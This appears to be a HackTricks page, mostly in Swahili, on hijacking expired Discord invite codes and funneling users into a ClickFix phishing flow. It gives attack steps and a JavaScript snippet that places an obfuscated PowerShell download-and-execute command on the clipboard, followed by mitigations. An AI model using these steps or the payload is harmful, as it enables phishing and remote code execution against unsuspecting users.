Discord Invite Hijacking

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Uwezo wa mfumo wa mwaliko wa Discord unaruhusu wahalifu kudai nambari za mwaliko zilizokwisha muda au kufutwa (za muda, za kudumu, au za kibinafsi) kama viungo vipya vya kibinafsi kwenye seva yoyote iliyoimarishwa kiwango cha 3. Kwa kupeleka nambari zote kwa herufi ndogo, washambuliaji wanaweza kujiandikisha mapema nambari za mwaliko zinazojulikana na kwa kimya kuhamasisha trafiki mara nambari ya asili inapokwisha muda au seva ya chanzo inapopoteza nguvu yake.

Aina za Mwaliko na Hatari ya Hijack

Aina ya MwalikoInaweza Kuwa Hijacked?Masharti / Maoni
Kiungo cha Mwaliko wa MudaBaada ya kuisha, nambari inapatikana na inaweza kujiandikisha tena kama URL ya kibinafsi na seva iliyoimarishwa.
Kiungo cha Mwaliko wa Kudumu⚠️Ikiwa imefutwa na inajumuisha herufi ndogo tu na nambari, nambari inaweza kupatikana tena.
Kiungo cha KibinafsiIkiwa seva ya asili inapoteza nguvu yake ya Kiwango cha 3, mwaliko wake wa kibinafsi unapatikana kwa usajili mpya.

Hatua za Kutumia

  1. Upelelezi
  • Fuata vyanzo vya umma (mifumo, mitandao ya kijamii, vituo vya Telegram) kwa viungo vya mwaliko vinavyolingana na muundo discord.gg/{code} au discord.com/invite/{code}.
  • Kusanya nambari za mwaliko zinazovutia (za muda au za kibinafsi).
  1. Usajili wa Mapema
  • Unda au tumia seva ya Discord iliyopo yenye haki za Kiwango cha 3.
  • Katika Mipangilio ya Seva → URL ya Kibinafsi, jaribu kupeana nambari ya mwaliko wa lengo. Ikiwa inakubaliwa, nambari hiyo inahifadhiwa na seva mbaya.
  1. Kuanzisha Hijack
  • Kwa mwaliko wa muda, subiri hadi mwaliko wa asili uishe (au uifute kwa mikono ikiwa unadhibiti chanzo).
  • Kwa nambari zinazojumuisha herufi kubwa, toleo la herufi ndogo linaweza kudaiwa mara moja, ingawa uelekezaji unaanza tu baada ya kuisha.
  1. Uelekezaji wa Kimya
  • Watumiaji wanaotembelea kiungo cha zamani wanapelekwa kwa urahisi kwenye seva inayodhibitiwa na mshambuliaji mara tu hijack inapoanza.

Mchakato wa Phishing kupitia Seva ya Discord

  1. Punguza vituo vya seva ili tu kituo cha #verify kiwe visible.
  2. Tumia bot (mfano, Safeguard#0786) kuwasihi wapya kuthibitisha kupitia OAuth2.
  3. Bot inaelekeza watumiaji kwenye tovuti ya phishing (mfano, captchaguard.me) chini ya kivuli cha hatua ya CAPTCHA au uthibitisho.
  4. Tekeleza hila ya UX ya ClickFix:
  • Onyesha ujumbe wa CAPTCHA ulioharibika.
  • Waongoze watumiaji kufungua mazungumzo ya Win+R, kubandika amri ya PowerShell iliyopakiwa mapema, na kubonyeza Enter.

Mfano wa Uingizaji wa ClickFix Clipboard

javascript
// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

Hii mbinu inakwepa upakuaji wa moja kwa moja wa faili na inatumia vipengele vya UI vinavyofahamika ili kupunguza mashaka ya mtumiaji.

Mitigations

  • Tumia viungo vya mwaliko vya kudumu vinavyokuwa na angalau herufi moja kubwa au alama zisizo za nambari (hazitakoma, hazitumiwi tena).
  • Badilisha mara kwa mara misimbo ya mwaliko na kufuta viungo vya zamani.
  • Fuata hali ya kuimarisha seva ya Discord na madai ya URL ya vanity.
  • Wafundishe watumiaji kuthibitisha uhalali wa seva na kuepuka kutekeleza amri zilizopachikwa kwenye clipboard.

References

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks